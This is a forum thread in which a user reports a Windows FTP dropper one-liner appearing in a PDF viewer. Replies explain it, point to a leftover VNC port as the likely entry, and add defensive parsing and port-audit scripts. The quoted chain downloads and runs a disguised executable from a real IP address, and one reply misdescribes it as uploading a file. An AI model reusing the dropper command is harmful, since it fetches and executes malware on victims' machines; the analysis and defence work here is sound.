Someone is trying to hack me.

Rudy Toody

Diamond Member
Sep 30, 2006
Code:
c echo open 72.64.46.25 21 >> ik &echo user windows update >> ik &echo binary >> ik &echo get windowsupdate.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &windowsupdate.exe &exitecho You got owned

I use a Linux AMD64 OS and this hack appears to be Windows, so I don't think it is doing any harm.

A pdf file on my desktop will pop open and the code segment then scrolls by in the Find box of the pdf viewer.

Questions:
  1. How does this get in?
  2. How can I stop it?
  3. Where do I report this?
 

unokitty

Diamond Member
Jan 5, 2012
Thinking out loud here...

Looks like you have encountered a bot that is trying to create a file called ik on your system. The ik file contains instructions that it then passes on to the "ftp" command. For example:

ftp> open 72.64.46.25 21
ftp> user windows update
ftp> binary
ftp> get windowsupdate.exe
ftp> bye

ftp -n -v -s:ik
del ik &windowsupdate.exe
exit

You got owned

In operation, it would appear to download what I would assume to be a trojaned windows update executable from a server at 72.64.46.25.

Then, it would appear to attempt to upload and delete the ik file. And finally, it prints out "You got owned."

Notes
A reverse IP lookup shows:
Resolve Host: pool-72-64-46-25.nrflva.east.verizon.net (72.64.46.25)
IP Location: United States, Norfolk, Verizon Internet Services (72.64.46.25)

Suspect that that is a previously compromised system.

How does it get in?
Through one of your open ports. Are you running VNC or similar?

How can I stop it?
Close that open port...

Where do I report this?
Don't have an answer for this...

Best of luck,
Uno
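The dropper chain broken down above, as an added example that is not part of the original post: a small Python triage script that splits the `&` chain, rebuilds the script the `echo ... >> ik` lines create for `ftp -s:ik`, and pulls out the indicators a responder wants (server, port, the `user`/password pair, the file fetched, what gets executed, what gets deleted). On Windows, `ftp -n` suppresses auto-login so the script's own `user` line is used, and `-v` hides the server's replies. The payload string is copied from the post; the regexes, field names and the reading of the leading "c" as the tail of a truncated `cmd /c` are this example's own assumptions.

```python
"""Triage helper for FTP-dropper one-liners like the one pasted in the thread.

Added example, not code from the original post. The payload style is: a chain
of `echo ... >> file` commands builds a script for `ftp -s:file`, ftp runs it
(`-n` suppresses auto-login so the script's own `user` line is used, `-v`
hides server replies), the script is deleted and the fetched binary is run.
Regexes and field names below are the example's own."""

import json
import re

# Payload as quoted in the thread. The leading "c" is read here as the tail of
# a truncated "cmd /c" (an assumption); the parser simply ignores it.
SAMPLE_PAYLOAD = (
    "c echo open 72.64.46.25 21 >> ik &echo user windows update >> ik "
    "&echo binary >> ik &echo get windowsupdate.exe >> ik &echo bye >> ik "
    "&ftp -n -v -s:ik &del ik &windowsupdate.exe &exitecho You got owned"
)

# `echo <text> >> <file>` (a single `>` is accepted too); the \b keeps the
# garbled trailing "exitecho ..." command from matching.
ECHO_RE = re.compile(r"\becho\s+(?P<line>.*?)\s*>{1,2}\s*(?P<file>\S+)$")
# `ftp ... -s:<file>`: the script file the ftp client will execute.
FTP_RE = re.compile(r"^ftp\b.*?-s:(?P<file>\S+)")


def split_chain(payload):
    """Split a cmd.exe '&' command chain into its individual commands."""
    return [c.strip() for c in payload.split("&") if c.strip()]


def reconstruct_scripts(commands):
    """Map each file written with `echo ... >> file` to its lines, in order."""
    scripts = {}
    for cmd in commands:
        m = ECHO_RE.search(cmd)
        if m:
            scripts.setdefault(m.group("file"), []).append(m.group("line"))
    return scripts


def extract_indicators(payload):
    """Return server, credentials, fetched/executed files and cleanup targets
    found in an `echo ... >> f & ftp -s:f` dropper chain."""
    commands = split_chain(payload)
    scripts = reconstruct_scripts(commands)
    ioc = {
        "script_file": None,
        "server": None,
        "port": None,
        "user": None,
        "password": None,
        "fetched": [],
        "executed": [],
        "cleanup": [],
    }
    for cmd in commands:
        m = FTP_RE.match(cmd)
        if m:
            ioc["script_file"] = m.group("file")
    # Walk the reconstructed ftp script: `open host [port]`,
    # `user name [password]`, `get remote [local]`.
    for line in scripts.get(ioc["script_file"], []):
        parts = line.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) >= 2:
            ioc["server"] = parts[1]
            has_port = len(parts) >= 3 and parts[2].isdigit()
            ioc["port"] = int(parts[2]) if has_port else 21
        elif verb == "user" and len(parts) >= 2:
            ioc["user"] = parts[1]
            ioc["password"] = parts[2] if len(parts) >= 3 else None
        elif verb == "get" and len(parts) >= 2:
            ioc["fetched"].append(parts[-1])  # local name is the last token
    # Back in the chain: `del` lines are cleanup, and a fetched file that
    # appears as a bare command is being executed.
    for cmd in commands:
        parts = cmd.split()
        if parts[0].lower() == "del":
            ioc["cleanup"].extend(parts[1:])
        elif parts[0] in ioc["fetched"]:
            ioc["executed"].append(parts[0])
    return ioc


if __name__ == "__main__":
    print(json.dumps(extract_indicators(SAMPLE_PAYLOAD), indent=2))
```

The `user` line of the rebuilt script is `user windows update`, i.e. username `windows` with password `update`, which is what the script passes to the server once `-n` has disabled auto-login. The server, port and fetched filename are what you would pivot on in firewall or proxy logs.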
 

unokitty

Diamond Member
Jan 5, 2012
Is it possible that this is some sort of a "drive by" download?

If it is, it could be coming in through your Internet connection when you surf an infected site...

Since it appears to be a Windows hack, I don't know how much it would concern me...

Perhaps someone else can provide some insight...


Best of luck,
Uno
 

Rudy Toody

Diamond Member
Sep 30, 2006
I discovered that I still had VNC installed from when I was playing around with controlling two other computers from this one. It didn't work as well as I would have preferred, so I decided not to do it. BUT! I forgot to uninstall VNC. I'll give it a few days to see if that is the fix. Thanks for the help.

Edit: Long time, 15 hours so far. No see.
 
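The forgotten VNC install is the usual way this happens: a remote-access service left listening after an experiment. As an added example (not from the original thread), this POSIX shell snippet audits `ss -Htln` output for well-known remote-access ports so a leftover listener shows up before the next bot does. The port-to-service table and the sample `ss` lines are constructed for the example.

```sh
#!/bin/sh
# Added example, not from the original thread: audit listening TCP sockets for
# leftover remote-access services (VNC, RDP, SSH, telnet). The port table is
# the example's own assumption.
# Usage:  ss -Htln | remote_access_listeners

# Echo a service name for a well-known remote-access port, nothing otherwise.
remote_access_service() {
    case "$1" in
        22) echo ssh ;;
        23) echo telnet ;;
        3389) echo rdp ;;
        5800|5801|5802) echo vnc-http ;;
        59[0-9][0-9]) echo vnc ;;      # VNC displays :0 .. :99
        *) ;;
    esac
}

# Read `ss -Htln` lines (State Recv-Q Send-Q Local:Port Peer:Port ...) on
# stdin and print "<service> <local:port>" for each remote-access listener.
# Returns 1 if any were found, 0 if the host is clean.
remote_access_listeners() {
    found=0
    while read -r _state _rq _sq laddr _peer _rest; do
        [ -n "$laddr" ] || continue
        port=${laddr##*:}          # handles 0.0.0.0:5900, [::]:5900 and *:5900
        svc=$(remote_access_service "$port")
        if [ -n "$svc" ]; then
            echo "$svc $laddr"
            found=1
        fi
    done
    return $found
}

# Constructed sample of ss output (not a real capture): a local CUPS listener
# that is fine, plus an SSH daemon and a VNC server on both address families.
SAMPLE_SS='LISTEN 0 128 127.0.0.1:631 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 5 0.0.0.0:5900 0.0.0.0:*
LISTEN 0 5 [::]:5900 [::]:*'

printf '%s\n' "$SAMPLE_SS" | remote_access_listeners \
    || echo "remote-access listeners found: stop and disable the service, then firewall the port"
```

Run it against the live host with `ss -Htln | remote_access_listeners`; anything it prints that you did not deliberately expose should be stopped and disabled (for a systemd unit, `systemctl disable --now <unit>`), not just firewalled, since the service is still reachable from the LAN otherwise.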

wayliff

Lifer
Nov 28, 2002

hey Rudy - try reporting it here...
http://www.ic3.gov/default.aspx
 

MrColin

Platinum Member
May 21, 2003
Unless you have locked your browsers down with SELinux/AppArmor and disabled scripts, you can still run malicious JavaScript from compromised/hostile websites. I don't think it's very far into the future before we see some of these things trojaning the Linux desktop also.

EDIT: Adding: I think you probably got that file web browsing via drive-by download.
 